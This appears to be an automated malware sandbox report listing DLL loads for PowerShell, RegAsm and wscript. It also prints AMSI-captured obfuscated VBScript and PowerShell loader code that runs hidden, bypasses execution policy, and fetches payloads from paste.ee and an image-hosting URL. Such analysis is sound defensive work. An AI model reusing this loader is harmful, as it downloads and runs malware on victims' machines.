            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wscript.exeAutomated click: OK
            Source: C:\Windows\System32\wscript.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") estrige = ("$(@(?(@?@?dig@?@? = '") & iristomia & "'" estrige = estrige & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" estrige = estrige & "[??}@*y??}@*" estrige = estrige & "t?*(?" estrige = estrige & "m.(@(?(@?@?" estrige = estrige & "nv?*(?r" estrige = estrige & "t]:" estrige = estrige & ":Fr@?@?" estrige = estrige & "mba??}@*" estrige = estrige & "?*(?64??}@*tring( $(@(?(" estrige = estrige & "@?@?d" estrige = estrige & "ig@?@?.r?*(?" estrige = estrige & "@%*:&la" estrige = estrige & "(@(?(?*(?('" estrige = estrige & "DgTr?*(?" estrige = estrige & "','" estrige = estrige & "A" estrige = estrige & "') ))" estrige = estrige & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" estrige = Replace(estrige,"@%*:&","p") estrige = Replace(estrige,"(@(?(","c") estrige = Replace(estrige,"?*(?","e") estrige = Replace(estrige,"@?@?","o") estrige = Replace(estrige,"??}@*","s") sumelga1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " sumelga1 = Replace(sumelga1,"(@(?(","c") sumelga1 = Replace(sumelga1,"??}@*","s") sumelga1 = Replace(sumelga1,"@?@?","o") sumelga1 = Replace(sumelga1,"@%*:&","p") sumelga = sumelga1 & """" & estrige & """" Cama.Run sumelga, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/FIwXa", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTreb
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTred